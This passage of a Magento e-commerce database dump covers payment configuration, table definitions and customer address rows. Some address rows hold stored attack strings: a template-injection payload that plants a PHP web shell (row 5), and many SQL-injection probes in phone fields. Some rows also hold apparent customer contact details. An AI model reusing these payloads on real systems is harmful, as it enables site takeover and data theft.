(122, 'default', 0, 'paypal/style/product_page_button_customize', '0', '2021-04-13 05:00:52'),
(123, 'default', 0, 'paypal/style/cart_page_button_customize', '0', '2021-04-13 05:00:52'),
(124, 'default', 0, 'paypal/style/mini_cart_page_button_customize', '0', '2021-04-13 05:00:52'),
(125, 'default', 0, 'paypal/style/disable_funding_options', NULL, '2021-04-13 05:00:52'),
(126, 'default', 0, 'payment/braintree/active', '0', '2021-04-13 05:00:52'),
(127, 'default', 0, 'payment/braintree_paypal/active', '0', '2021-04-13 05:00:52'),
(128, 'default', 0, 'payment/braintree_cc_vault/active', '0', '2021-04-13 05:00:52'),
(129, 'default', 0, 'payment/braintree/title', 'Credit Card (Braintree)', '2021-04-13 05:00:52'),
(130, 'default', 0, 'payment/braintree/environment', 'sandbox', '2021-04-13 05:00:52'),
(131, 'default', 0, 'payment/braintree/payment_action', 'authorize', '2021-04-13 05:00:52'),
(132, 'default', 0, 'payment/braintree/merchant_id', NULL, '2021-04-13 05:00:52'),
(133, 'default', 0, 'payment/braintree/public_key', NULL, '2021-04-13 05:00:52'),
(134, 'default', 0, 'payment/braintree/private_key', NULL, '2021-04-13 05:00:52'),
(135, 'default', 0, 'payment/braintree_cc_vault/title', 'Stored Cards (Braintree)', '2021-04-13 05:00:52'),
(136, 'default', 0, 'payment/braintree/merchant_account_id', NULL, '2021-04-13 05:00:52'),
(137, 'default', 0, 'payment/braintree/fraudprotection', '0', '2021-04-13 05:00:52'),
(138, 'default', 0, 'payment/braintree/debug', '0', '2021-04-13 05:00:52'),
(139, 'default', 0, 'payment/braintree/useccv', '1', '2021-04-13 05:00:52'),
(140, 'default', 0, 'payment/braintree/cctypes', 'CUP,AE,VI,MC,DI,JCB,DN,MI', '2021-04-13 05:00:52'),
(141, 'default', 0, 'payment/braintree/sort_order', NULL, '2021-04-13 05:00:52'),
(142, 'default', 0, 'payment/braintree/allowspecific', '0', '2021-04-13 05:00:52'),
(143, 'default', 0, 'payment/braintree/specificcountry', NULL, '2021-04-13 05:00:52'),
(144, 'default', 0, 'payment/braintree/countrycreditcard', '[]', '2021-04-13 05:00:52'),
(145, 'default', 0, 'payment/braintree_paypal/title', 'PayPal (Braintree)', '2021-04-13 05:00:52'),
(146, 'default', 0, 'payment/braintree_paypal_vault/active', '0', '2021-04-13 05:00:52'),
(147, 'default', 0, 'payment/braintree_paypal/sort_order', NULL, '2021-04-13 05:00:52'),
(148, 'default', 0, 'payment/braintree_paypal/merchant_name_override', NULL, '2021-04-13 05:00:52'),
(149, 'default', 0, 'payment/braintree_paypal/payment_action', 'authorize', '2021-04-13 05:00:52'),
(150, 'default', 0, 'payment/braintree_paypal/allowspecific', '0', '2021-04-13 05:00:52'),
(151, 'default', 0, 'payment/braintree_paypal/specificcountry', NULL, '2021-04-13 05:00:52'),
(152, 'default', 0, 'payment/braintree_paypal/require_billing_address', '0', '2021-04-13 05:00:52'),
(153, 'default', 0, 'payment/braintree_paypal/allow_shipping_address_override', '1', '2021-04-13 05:00:52'),
(154, 'default', 0, 'payment/braintree_paypal/debug', '0', '2021-04-13 05:00:52'),
(155, 'default', 0, 'payment/braintree_paypal/display_on_shopping_cart', '1', '2021-04-13 05:00:52'),
(156, 'default', 0, 'payment/braintree_paypal/skip_order_review', '0', '2021-04-13 05:00:52'),
(157, 'default', 0, 'payment/braintree/verify_3dsecure', '0', '2021-04-13 05:00:52'),
(158, 'default', 0, 'payment/braintree/threshold_amount', NULL, '2021-04-13 05:00:52'),
(159, 'default', 0, 'payment/braintree/verify_all_countries', '0', '2021-04-13 05:00:52'),
(160, 'default', 0, 'payment/braintree/verify_specific_countries', NULL, '2021-04-13 05:00:52'),
(161, 'default', 0, 'payment/braintree/descriptor_name', NULL, '2021-04-13 05:00:52'),
(162, 'default', 0, 'payment/braintree/descriptor_phone', NULL, '2021-04-13 05:00:52'),
(163, 'default', 0, 'payment/braintree/descriptor_url', NULL, '2021-04-13 05:00:52'),
(164, 'default', 0, 'payment/wps_express/active', '0', '2021-04-13 05:00:52'),
(165, 'default', 0, 'klarna/api/api_version', 'kp_eu', '2021-04-13 05:00:52'),
(166, 'default', 0, 'klarna/api/merchant_id', NULL, '2021-04-13 05:00:52'),
(167, 'default', 0, 'klarna/api/shared_secret', NULL, '2021-04-13 05:00:52'),
(168, 'default', 0, 'klarna/api/test_mode', '1', '2021-04-13 05:00:52'),
(169, 'default', 0, 'klarna/api/debug', '1', '2021-04-13 05:00:52'),
(170, 'default', 0, 'payment/klarna_kp/active', '0', '2021-04-13 05:00:52'),
(171, 'default', 0, 'payment/klarna_kp/allowspecific', '0', '2021-04-13 05:00:52'),
(172, 'default', 0, 'payment/klarna_kp/enable_b2b', '0', '2021-04-13 05:00:52'),
(173, 'default', 0, 'payment/klarna_kp/data_sharing', '1', '2021-04-13 05:00:52'),
(174, 'default', 0, 'payment/klarna_kp/data_sharing_onload', '1', '2021-04-13 05:00:52'),
(175, 'default', 0, 'payment/klarna_kp/sort_order', NULL, '2021-04-13 05:00:52'),
(176, 'default', 0, 'checkout/klarna_kp_design/color_details', NULL, '2021-04-13 05:00:52'),
(177, 'default', 0, 'checkout/klarna_kp_design/color_border', NULL, '2021-04-13 05:00:52'),
(178, 'default', 0, 'checkout/klarna_kp_design/color_border_selected', NULL, '2021-04-13 05:00:52'),
(179, 'default', 0, 'checkout/klarna_kp_design/color_text', NULL, '2021-04-13 05:00:52'),
(180, 'default', 0, 'checkout/klarna_kp_design/color_radius_border', NULL, '2021-04-13 05:00:52'),
(181, 'default', 0, 'payment/amazon_payment/merchant_id', NULL, '2021-04-13 05:00:52'),
(182, 'default', 0, 'payment/amazon_payment/access_key', NULL, '2021-04-13 05:00:52'),
(183, 'default', 0, 'payment/amazon_payment/secret_key', NULL, '2021-04-13 05:00:52'),
(184, 'default', 0, 'payment/amazon_payment/client_id', NULL, '2021-04-13 05:00:52'),
(185, 'default', 0, 'payment/amazon_payment/client_secret', NULL, '2021-04-13 05:00:52'),
(186, 'default', 0, 'payment/amazon_payment/credentials_json', NULL, '2021-04-13 05:00:52'),
(187, 'default', 0, 'payment/amazon_payment/payment_region', NULL, '2021-04-13 05:00:52'),
(188, 'default', 0, 'payment/amazon_payment/sandbox', '0', '2021-04-13 05:00:52'),
(189, 'default', 0, 'payment/amazon_payment/active', '0', '2021-04-13 05:00:52'),
(190, 'default', 0, 'payment/amazon_payment/lwa_enabled', '0', '2021-04-13 05:00:52'),
(191, 'default', 0, 'payment/amazon_payment/payment_action', 'authorize', '2021-04-13 05:00:52'),
(192, 'default', 0, 'payment/amazon_payment/authorization_mode', 'synchronous', '2021-04-13 05:00:52'),
(193, 'default', 0, 'payment/amazon_payment/update_mechanism', 'polling', '2021-04-13 05:00:52'),
(194, 'default', 0, 'payment/amazon_payment/button_display_language', NULL, '2021-04-13 05:00:52'),
(195, 'default', 0, 'payment/amazon_payment/button_color', 'Gold', '2021-04-13 05:00:52'),
(196, 'default', 0, 'payment/amazon_payment/button_size', 'medium', '2021-04-13 05:00:52'),
(197, 'default', 0, 'payment/amazon_payment/amazon_login_in_popup', '1', '2021-04-13 05:00:52'),
(198, 'default', 0, 'payment/amazon_payment/pwa_pp_button_is_visible', '1', '2021-04-13 05:00:52'),
(199, 'default', 0, 'payment/amazon_payment/minicart_button_is_visible', '1', '2021-04-13 05:00:52'),
(200, 'default', 0, 'payment/amazonlogin/active', '0', '2021-04-13 05:00:52'),
(201, 'default', 0, 'payment/amazon_payment/multicurrency', '0', '2021-04-13 05:00:52'),
(202, 'default', 0, 'payment/amazon_payment/storename', NULL, '2021-04-13 05:00:52'),
(203, 'default', 0, 'payment/amazon_payment/logging', '1', '2021-04-13 05:00:52'),
(204, 'default', 0, 'payment/amazon_payment/allowed_ips', NULL, '2021-04-13 05:00:52'),
(205, 'default', 0, 'payment/checkmo/active', '0', '2021-04-13 05:00:52'),
(206, 'default', 0, 'payment/checkmo/specificcountry', NULL, '2021-04-13 05:00:52'),
(207, 'default', 0, 'payment/checkmo/payable_to', NULL, '2021-04-13 05:00:52'),
(208, 'default', 0, 'payment/checkmo/mailing_address', NULL, '2021-04-13 05:00:52'),
(209, 'default', 0, 'payment/checkmo/min_order_total', NULL, '2021-04-13 05:00:52'),
(210, 'default', 0, 'payment/checkmo/max_order_total', NULL, '2021-04-13 05:00:52'),
(211, 'default', 0, 'payment/checkmo/sort_order', NULL, '2021-04-13 05:00:52'),
(212, 'default', 0, 'payment/cashondelivery/active', '1', '2021-04-13 05:00:52'),
(213, 'default', 0, 'payment/cashondelivery/specificcountry', NULL, '2021-04-13 05:00:52'),
(214, 'default', 0, 'payment/cashondelivery/instructions', NULL, '2021-04-13 05:00:52'),
(215, 'default', 0, 'payment/cashondelivery/min_order_total', NULL, '2021-04-13 05:00:52'),
(216, 'default', 0, 'payment/cashondelivery/max_order_total', NULL, '2021-04-13 05:00:52'),
(217, 'default', 0, 'payment/cashondelivery/sort_order', NULL, '2021-04-13 05:00:52'),
(218, 'default', 0, 'payment/banktransfer/specificcountry', NULL, '2021-04-13 05:00:52'),
(219, 'default', 0, 'payment/banktransfer/instructions', NULL, '2021-04-13 05:00:52'),
(220, 'default', 0, 'payment/banktransfer/min_order_total', NULL, '2021-04-13 05:00:52'),
(221, 'default', 0, 'payment/banktransfer/max_order_total', NULL, '2021-04-13 05:00:52'),
(222, 'default', 0, 'payment/banktransfer/sort_order', NULL, '2021-04-13 05:00:52'),
(223, 'default', 0, 'payment/free/specificcountry', NULL, '2021-04-13 05:00:52'),
(224, 'default', 0, 'payment/purchaseorder/specificcountry', NULL, '2021-04-13 05:00:52'),
(225, 'default', 0, 'payment/purchaseorder/min_order_total', NULL, '2021-04-13 05:00:52'),
(226, 'default', 0, 'payment/purchaseorder/max_order_total', NULL, '2021-04-13 05:00:52'),
(227, 'default', 0, 'payment/purchaseorder/sort_order', NULL, '2021-04-13 05:00:52'),
(228, 'default', 0, 'payment/authorizenet_acceptjs/environment', 'production', '2021-04-13 05:00:52'),
(229, 'default', 0, 'payment/authorizenet_acceptjs/specificcountry', NULL, '2021-04-13 05:00:52'),
(230, 'default', 0, 'payment/authorizenet_acceptjs/min_order_total', NULL, '2021-04-13 05:00:52'),
(231, 'default', 0, 'payment/authorizenet_acceptjs/max_order_total', NULL, '2021-04-13 05:00:52'),
(232, 'default', 0, 'payment/authorizenet_acceptjs/sort_order', NULL, '2021-04-13 05:00:52'),
(233, 'default', 0, 'payment/authorizenet_directpost/login', NULL, '2021-04-13 05:00:52'),
(234, 'default', 0, 'payment/authorizenet_directpost/trans_key', NULL, '2021-04-13 05:00:52'),
(235, 'default', 0, 'payment/authorizenet_directpost/signature_key', NULL, '2021-04-13 05:00:52'),
(236, 'default', 0, 'payment/authorizenet_directpost/trans_md5', NULL, '2021-04-13 05:00:52'),
(237, 'default', 0, 'payment/authorizenet_directpost/merchant_email', NULL, '2021-04-13 05:00:52'),
(238, 'default', 0, 'payment/authorizenet_directpost/useccv', '0', '2021-04-13 05:00:52'),
(239, 'default', 0, 'payment/authorizenet_directpost/specificcountry', NULL, '2021-04-13 05:00:52'),
(240, 'default', 0, 'payment/authorizenet_directpost/min_order_total', NULL, '2021-04-13 05:00:52'),
(241, 'default', 0, 'payment/authorizenet_directpost/max_order_total', NULL, '2021-04-13 05:00:52'),
(242, 'default', 0, 'payment/authorizenet_directpost/sort_order', NULL, '2021-04-13 05:00:52'),
(243, 'default', 0, 'currency/options/customsymbol', '{\"BDT\":\"Tk\"}', '2021-04-13 12:16:47'),
(244, 'default', 0, 'checkout/cart/redirect_to_cart', '1', '2021-05-03 08:39:14'),
(245, 'stores', 1, 'design/head/shortcut_icon', 'stores/1/bismoy.png', '2021-05-11 05:15:11'),
(246, 'default', 0, 'catalog/frontend/list_allow_all', '0', '2021-06-09 04:21:01'),
(247, 'default', 0, 'catalog/frontend/flat_catalog_product', '0', '2021-06-09 04:21:02'),
(248, 'default', 0, 'catalog/productalert_cron/frequency', 'D', '2021-06-09 04:21:02'),
(249, 'default', 0, 'crontab/default/jobs/catalog_product_alert/schedule/cron_expr', '0 0 * * *', '2021-06-09 04:21:02'),
(250, 'default', 0, 'crontab/default/jobs/catalog_product_alert/run/model', NULL, '2021-06-09 04:21:02'),
(251, 'default', 0, 'catalog/productalert_cron/time', '00,00,00', '2021-06-09 04:21:02'),
(252, 'default', 0, 'catalog/productalert_cron/error_email', NULL, '2021-06-09 04:21:02'),
(253, 'default', 0, 'catalog/recently_products/synchronize_with_backend', '1', '2021-06-09 04:21:02'),
(254, 'default', 0, 'catalog/product_video/youtube_api_key', NULL, '2021-06-09 04:21:02'),
(255, 'default', 0, 'catalog/price/scope', '0', '2021-06-09 04:21:02'),
(256, 'default', 0, 'catalog/search/search_recommendations_enabled', '1', '2021-06-09 04:21:02'),
(257, 'default', 0, 'catalog/search/search_recommendations_count', '5', '2021-06-09 04:21:02'),
(258, 'default', 0, 'catalog/search/search_recommendations_count_results_enabled', '0', '2021-06-09 04:21:02'),
(259, 'default', 0, 'catalog/search/search_suggestion_enabled', '1', '2021-06-09 04:21:02'),
(260, 'default', 0, 'catalog/search/search_suggestion_count', '2', '2021-06-09 04:21:02'),
(261, 'default', 0, 'catalog/search/search_suggestion_count_results_enabled', '0', '2021-06-09 04:21:02'),
(262, 'default', 0, 'catalog/downloadable/shareable', '0', '2021-06-09 04:21:02'),
(263, 'default', 0, 'catalog/downloadable/content_disposition', 'inline', '2021-06-09 04:21:02'),
(264, 'default', 0, 'catalog/custom_options/use_calendar', '0', '2021-06-09 04:21:02'),
(265, 'default', 0, 'catalog/custom_options/year_range', ',', '2021-06-09 04:21:02'),
(266, 'default', 0, 'catalog/placeholder/image_placeholder', NULL, '2021-06-09 04:21:02'),
(267, 'default', 0, 'catalog/placeholder/small_image_placeholder', NULL, '2021-06-09 04:21:02'),
(268, 'default', 0, 'catalog/placeholder/swatch_image_placeholder', NULL, '2021-06-09 04:21:02'),
(269, 'default', 0, 'catalog/placeholder/thumbnail_placeholder', NULL, '2021-06-09 04:21:02'),
(270, 'default', 0, 'reports/options/enabled', '1', '2021-06-09 06:36:31'),
(271, 'default', 0, 'reports/options/product_view_enabled', '1', '2021-06-09 06:36:31'),
(272, 'default', 0, 'reports/options/product_send_enabled', '1', '2021-06-09 06:36:31'),
(273, 'default', 0, 'reports/options/product_compare_enabled', '1', '2021-06-09 06:36:31'),
(274, 'default', 0, 'reports/options/product_to_cart_enabled', '1', '2021-06-09 06:36:31'),
(275, 'default', 0, 'reports/options/product_to_wishlist_enabled', '1', '2021-06-09 06:36:31'),
(276, 'default', 0, 'reports/options/wishlist_share_enabled', '1', '2021-06-09 06:36:31');

-- --------------------------------------------------------

--
-- Table structure for table `cron_schedule`
--

CREATE TABLE `cron_schedule` (
  `schedule_id` int(10) UNSIGNED NOT NULL COMMENT 'Schedule ID',
  `job_code` varchar(255) NOT NULL DEFAULT '0' COMMENT 'Job Code',
  `status` varchar(7) NOT NULL DEFAULT 'pending' COMMENT 'Status',
  `messages` text DEFAULT NULL COMMENT 'Messages',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Created At',
  `scheduled_at` timestamp NULL DEFAULT NULL COMMENT 'Scheduled At',
  `executed_at` timestamp NULL DEFAULT NULL COMMENT 'Executed At',
  `finished_at` timestamp NULL DEFAULT NULL COMMENT 'Finished At'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Cron Schedule';

-- --------------------------------------------------------

--
-- Table structure for table `customer_address_entity`
--

CREATE TABLE `customer_address_entity` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `increment_id` varchar(50) DEFAULT NULL COMMENT 'Increment ID',
  `parent_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Parent ID',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Created At',
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Updated At',
  `is_active` smallint(5) UNSIGNED NOT NULL DEFAULT 1 COMMENT 'Is Active',
  `city` varchar(255) NOT NULL COMMENT 'City',
  `company` varchar(255) DEFAULT NULL COMMENT 'Company',
  `country_id` varchar(255) NOT NULL COMMENT 'Country',
  `fax` varchar(255) DEFAULT NULL COMMENT 'Fax',
  `firstname` varchar(255) NOT NULL COMMENT 'First Name',
  `lastname` varchar(255) NOT NULL COMMENT 'Last Name',
  `middlename` varchar(255) DEFAULT NULL COMMENT 'Middle Name',
  `postcode` varchar(255) DEFAULT NULL COMMENT 'Zip/Postal Code',
  `prefix` varchar(40) DEFAULT NULL COMMENT 'Name Prefix',
  `region` varchar(255) DEFAULT NULL COMMENT 'State/Province',
  `region_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'State/Province',
  `street` text NOT NULL COMMENT 'Street Address',
  `suffix` varchar(40) DEFAULT NULL COMMENT 'Name Suffix',
  `telephone` varchar(255) NOT NULL COMMENT 'Phone Number',
  `vat_id` varchar(255) DEFAULT NULL COMMENT 'VAT number',
  `vat_is_valid` int(10) UNSIGNED DEFAULT NULL COMMENT 'VAT number validity',
  `vat_request_date` varchar(255) DEFAULT NULL COMMENT 'VAT number validation request date',
  `vat_request_id` varchar(255) DEFAULT NULL COMMENT 'VAT number validation request ID',
  `vat_request_success` int(10) UNSIGNED DEFAULT NULL COMMENT 'VAT number validation request success'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Customer Address Entity';

--
-- Dumping data for table `customer_address_entity`
--

INSERT INTO `customer_address_entity` (`entity_id`, `increment_id`, `parent_id`, `created_at`, `updated_at`, `is_active`, `city`, `company`, `country_id`, `fax`, `firstname`, `lastname`, `middlename`, `postcode`, `prefix`, `region`, `region_id`, `street`, `suffix`, `telephone`, `vat_id`, `vat_is_valid`, `vat_request_date`, `vat_request_id`, `vat_request_success`) VALUES
(1, NULL, 1, '2020-08-08 01:45:04', '2020-08-08 01:45:04', 1, 'Calder', NULL, 'US', NULL, 'Veronica', 'Costello', NULL, '49628-7978', NULL, 'Michigan', 33, '6146 Honey Bluff Parkway', NULL, '(555) 229-3326', NULL, NULL, NULL, NULL, NULL),
(2, NULL, 64, '2023-02-26 09:40:42', '2023-02-26 09:40:42', 1, 'my city', NULL, 'AT', NULL, 'Tomo{{o}}kazu', 'Lulu36', NULL, '12345', NULL, 'Burgenland', 102, 'my street', NULL, '516-555-1111', NULL, NULL, NULL, NULL, NULL),
(3, NULL, 66, '2023-05-01 18:49:34', '2023-05-01 18:49:34', 1, 'my city', NULL, 'AT', NULL, 'Tomo{{o}}kazu', 'Ben_Pouros', NULL, '12345', NULL, 'Burgenland', 102, 'my street', NULL, '516-555-1111', NULL, NULL, NULL, NULL, NULL),
(4, NULL, 68, '2023-06-18 23:46:57', '2023-06-18 23:47:41', 1, 'Fenton', NULL, 'US', NULL, 'Mick', 'Rukstelo', NULL, '48430', NULL, 'Michigan', 33, '7050 Hickory Valley Drive', NULL, '9072546985', NULL, NULL, NULL, NULL, NULL),
(5, NULL, 68, '2023-06-18 23:47:59', '2023-06-18 23:47:59', 1, 'Fenton', NULL, 'US', NULL, '{{if this.getTemplateFilter().filter(dummy)}}{{/if}}', 'error{{if this.getTemplateFilter().addAfterFilterCallback(base64_decode).addAfterFilterCallback(system).Filter(Y2QgcHViO2VjaG8gJzw/cGhwIGVjaG8gIk9LIjtAZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsicG5wIl0pKTsgJyA+IGhlYWx0aF9jaGVjay5waHA=)}}m{{/if}}', NULL, '48430', NULL, 'Michigan', 33, '7050 Hickory Valley Drive', NULL, '9072546985', NULL, NULL, NULL, NULL, NULL),
(6, NULL, 74, '2023-08-12 01:27:41', '2023-08-12 01:27:41', 1, 'fergina', 'greds', 'AU', NULL, 'bismoy.com.g4U', 'google.com', NULL, '25410', NULL, 'New South Wales', 570, 'freu 45', NULL, '4751201245', NULL, NULL, NULL, NULL, NULL),
(7, NULL, 116, '2026-01-02 07:02:55', '2026-01-02 07:42:10', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(8, NULL, 116, '2026-01-02 07:03:03', '2026-01-02 07:42:10', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(9, NULL, 116, '2026-01-02 07:03:09', '2026-01-02 07:42:10', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(10, NULL, 116, '2026-01-02 07:03:10', '2026-01-02 07:42:10', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '-1 OR 5*5=25 --', '1', NULL, NULL, NULL, NULL),
(11, NULL, 116, '2026-01-02 07:03:11', '2026-01-02 07:42:10', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '-1 OR 5*5=26 --', '1', NULL, NULL, NULL, NULL),
(12, NULL, 116, '2026-01-02 07:03:12', '2026-01-02 07:42:10', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '-1 OR 5*5=25', '1', NULL, NULL, NULL, NULL),
(13, NULL, 116, '2026-01-02 07:03:13', '2026-01-02 07:42:10', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '-1 OR 5*5=26', '1', NULL, NULL, NULL, NULL),
(14, NULL, 116, '2026-01-02 07:03:14', '2026-01-02 07:42:10', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '-1\' OR 5*5=25 --', '1', NULL, NULL, NULL, NULL),
(15, NULL, 116, '2026-01-02 07:03:15', '2026-01-02 07:42:10', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '-1\' OR 5*5=26 --', '1', NULL, NULL, NULL, NULL),
(16, NULL, 116, '2026-01-02 07:03:17', '2026-01-02 07:42:10', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '-1\" OR 5*5=25 --', '1', NULL, NULL, NULL, NULL),
(17, NULL, 116, '2026-01-02 07:03:18', '2026-01-02 07:42:10', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '-1\" OR 5*5=26 --', '1', NULL, NULL, NULL, NULL),
(18, NULL, 116, '2026-01-02 07:03:19', '2026-01-02 07:42:10', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '-1\' OR 5*5=25 or \'6Z7yI5k8\'=\'', '1', NULL, NULL, NULL, NULL),
(19, NULL, 116, '2026-01-02 07:03:20', '2026-01-02 07:42:10', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '-1\' OR 5*5=26 or \'6Z7yI5k8\'=\'', '1', NULL, NULL, NULL, NULL),
(20, NULL, 116, '2026-01-02 07:03:22', '2026-01-02 07:42:11', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '-1\" OR 5*5=25 or \"IMeefmtw\"=\"', '1', NULL, NULL, NULL, NULL),
(21, NULL, 116, '2026-01-02 07:03:23', '2026-01-02 07:42:11', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '-1\" OR 5*5=26 or \"IMeefmtw\"=\"', '1', NULL, NULL, NULL, NULL),
(22, NULL, 116, '2026-01-02 07:03:28', '2026-01-02 07:42:11', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', 'if(now()=sysdate(),sleep(15),0)', '1', NULL, NULL, NULL, NULL),
(23, NULL, 116, '2026-01-02 07:03:34', '2026-01-02 07:42:11', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-06060\'XOR(if(now()=sysdate(),sleep(15),0))XOR\'Z', '1', NULL, NULL, NULL, NULL),
(24, NULL, 116, '2026-01-02 07:03:38', '2026-01-02 07:42:11', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-06060\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z', '1', NULL, NULL, NULL, NULL),
(25, NULL, 116, '2026-01-02 07:03:44', '2026-01-02 07:42:11', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '(select(0)from(select(sleep(15)))v)/*\'+(select(0)from(select(sleep(15)))v)+\'\"+(select(0)from(select(sleep(15)))v)+\"*/', '1', NULL, NULL, NULL, NULL),
(26, NULL, 116, '2026-01-02 07:03:49', '2026-01-02 07:42:11', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606-1 waitfor delay \'0:0:15\' --', '1', NULL, NULL, NULL, NULL),
(27, NULL, 116, '2026-01-02 07:03:54', '2026-01-02 07:42:11', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606YNpqrD6t\'; waitfor delay \'0:0:15\' --', '1', NULL, NULL, NULL, NULL),
(28, NULL, 116, '2026-01-02 07:03:59', '2026-01-02 07:42:11', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606fYS6FeG8\' OR 473=(SELECT 473 FROM PG_SLEEP(15))--', '1', NULL, NULL, NULL, NULL),
(29, NULL, 116, '2026-01-02 07:04:04', '2026-01-02 07:42:11', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606WaZfbN0Z\') OR 354=(SELECT 354 FROM PG_SLEEP(15))--', '1', NULL, NULL, NULL, NULL),
(30, NULL, 116, '2026-01-02 07:04:09', '2026-01-02 07:42:11', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606EK2hb4Vp\')) OR 44=(SELECT 44 FROM PG_SLEEP(15))--', '1', NULL, NULL, NULL, NULL),
(31, NULL, 116, '2026-01-02 07:04:13', '2026-01-02 07:42:11', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606\'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||\'', '1', NULL, NULL, NULL, NULL),
(32, NULL, 116, '2026-01-02 07:04:19', '2026-01-02 07:42:11', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '(select DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15) from dual)', '1', NULL, NULL, NULL, NULL),
(33, NULL, 116, '2026-01-02 07:04:20', '2026-01-02 07:42:11', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606', '1', NULL, NULL, NULL, NULL),
(34, NULL, 116, '2026-01-02 07:04:20', '2026-01-02 07:42:11', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '555-666-0606\'\"', '1', NULL, NULL, NULL, NULL),
(35, NULL, 116, '2026-01-02 07:04:22', '2026-01-02 07:42:11', 1, 'San Francisco', 'Testing', 'AF', '317-317-3137', 'CpjJwWHV', 'CpjJwWHV', 'CpjJwWHV', '94102', '317', 'NY', 1, '1', '1', '@@yyU4v', '1', NULL, NULL, NULL, NULL),
